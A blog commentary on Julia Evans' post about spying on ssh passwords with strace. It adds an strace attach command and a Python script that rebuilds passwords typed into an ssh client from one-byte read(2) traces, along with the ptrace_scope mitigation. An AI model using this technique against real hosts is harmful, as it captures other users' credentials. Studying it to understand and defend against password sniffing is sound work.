Spying on ssh with strace by Julia Evans.
From the post:
In the shower this morning I was thinking about strace and ltrace and how they let you inspect the system calls a running process is making. I’ve played a bit with strace on this blog before (see Understanding how killall works using strace), but it’s clear to me that there are tons of uses for it I haven’t explored yet.
Then I thought “Hey! If you can look at the system calls with strace and the library calls with ltrace, can you spy on people’s ssh passwords?!”
It turns out that you can! I was going to do original research, but as with most things one thinks up in the shower, it turns out someone’s already done this before. So I googled it and I found this blog post explaining how to spy on ssh. The instructions here are just taken from there 🙂
…
Julia re-discovered that strace, attached to a running ssh client, exposes the password the client reads from the terminal.
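The mechanism is worth spelling out, because nothing in ssh's cryptography is broken: strace attaches to the client with ptrace and reports the arguments of every read(2), and OpenSSH's readpassphrase() pulls the password from the tty one byte per read(2), so each keystroke shows up as its own trace line. The following Python is an added example written for this page, not code from Julia's post or from the post she links. It parses strace-style read(2) lines (including the `\\`, `\"` and octal `\NNN` escapes strace uses, the `"..."` marker for buffers truncated by `-s`, and the optional `[pid N]` and timestamp prefixes) and reassembles whatever was typed one byte at a time. The trace text, the strace command in the comment and the descriptor numbers are constructed for illustration.

```python
import re

# Lines of the kind produced by something like
#   strace -p "$(pgrep -n ssh)" -e trace=read -o ssh.trace
# while the user types a password at the client's prompt. OpenSSH's
# readpassphrase() reads keystrokes from the tty one byte per read(2),
# so every character of the password arrives as its own line.
# This sample is CONSTRUCTED for the example: the fd numbers and the
# bulk reads on fd 3 (the network socket) are illustrative, not captured.
SAMPLE_TRACE = r'''
read(3, "SSH-2.0-OpenSSH_9.9\r\n", 256)  = 21
read(3, "\0\0\4\24\n\24\0\0\0\0\0\0\0\0\0\0"..., 8192) = 1024
read(4, "h", 1)                         = 1
read(4, "u", 1)                         = 1
read(4, "n", 1)                         = 1
read(4, "t", 1)                         = 1
read(4, "e", 1)                         = 1
read(4, "r", 1)                         = 1
read(4, "\\", 1)                        = 1
read(4, "\"", 1)                        = 1
read(4, "\303", 1)                      = 1
read(4, "\251", 1)                      = 1
read(4, "2", 1)                         = 1
read(4, "\n", 1)                        = 1
'''

READ_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?'                # "[pid N] " prefix when run with -f
    r'(?:\d{2}:\d{2}:\d{2}(?:\.\d+)?\s+)?'   # timestamp prefix when run with -t/-tt
    r'read\((\d+),\s*'                       # file descriptor
    r'"((?:[^"\\]|\\.)*)"(?:\.\.\.)?'        # strace-escaped buffer, "..." if cut by -s
    r',\s*\d+\)\s*=\s*(-?\d+)'               # requested length, return value
)

# strace escapes non-printables as \NNN (octal), \xHH with -x, and the usual
# C escapes; backslash and double quote are written \\ and \".
ESC_RE = re.compile(r'\\(x[0-9a-fA-F]{2}|[0-7]{1,3}|.)')
SIMPLE_ESCAPES = {'n': b'\n', 't': b'\t', 'r': b'\r', 'v': b'\v', 'f': b'\f',
                  'a': b'\a', 'b': b'\b', '\\': b'\\', '"': b'"'}


def unescape(text):
    """Turn the quoted buffer as strace prints it back into raw bytes."""
    out = bytearray()
    pos = 0
    for m in ESC_RE.finditer(text):
        out += text[pos:m.start()].encode('latin-1')
        esc = m.group(1)
        if esc.startswith('x'):
            out.append(int(esc[1:], 16))
        elif esc[0] in '01234567':
            out.append(int(esc, 8) & 0xFF)
        else:
            out += SIMPLE_ESCAPES.get(esc, esc.encode('latin-1'))
        pos = m.end()
    out += text[pos:].encode('latin-1')
    return bytes(out)


def parse_reads(trace):
    """Return (fd, data, return_value) for every read(2) line in strace output."""
    reads = []
    for line in trace.splitlines():
        m = READ_RE.match(line)
        if m:
            reads.append((int(m.group(1)), unescape(m.group(2)), int(m.group(3))))
    return reads


def extract_typed_lines(trace, fd=None):
    """Reassemble what the user typed from the one-byte reads.

    Enter arrives as "\\n" (or "\\r") and ends the line. Reads that returned
    more than one byte (network traffic, key files) are not keystrokes and
    are skipped; pass fd= to restrict to the terminal's descriptor. Bytes are
    accumulated before decoding so multi-byte UTF-8 characters split across
    reads come back intact.
    """
    typed = []
    buf = bytearray()
    for read_fd, data, ret in parse_reads(trace):
        if ret != 1 or (fd is not None and read_fd != fd):
            continue
        if data in (b'\n', b'\r'):
            if buf:
                typed.append(buf.decode('utf-8', errors='replace'))
                buf = bytearray()
        else:
            buf += data
    return typed


if __name__ == '__main__':
    for secret in extract_typed_lines(SAMPLE_TRACE):
        print('captured:', secret)
```

The check a practitioner wants before worrying about this on a shared host: strace can only attach if the kernel allows the attacker to ptrace the ssh process, which means root, or the same uid with `/proc/sys/kernel/yama/ptrace_scope` set to 0. With Yama's usual default of 1 an unprivileged user can only trace processes they themselves started, so keeping ptrace_scope at 1 or higher is the standard mitigation; nothing here weakens ssh's transport encryption, it simply reads the password before it is encrypted.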
Good for Julia, but shouldn’t it be unnecessary for her to “re-discover” this use of strace?
That is, adding a new or innovative use of strace to the general body of knowledge about it would be more useful than re-finding a known one.
Not to take anything away from Julia’s realizing that strace applies to ssh, which is probably the better way to learn, but progress is slowed when old lessons have to be re-learned time and time again.
The man page on strace reports the release of strace 2.5 in 1992, so this isn’t a recent command.
Capturing the long legacy of sysadmin knowledge would pay off in maintaining older systems and perhaps in avoiding mistakes in the design of new ones.
BTW, I found a map today that may help you find interesting places to explore in the Linux kernel. More on that in a minute.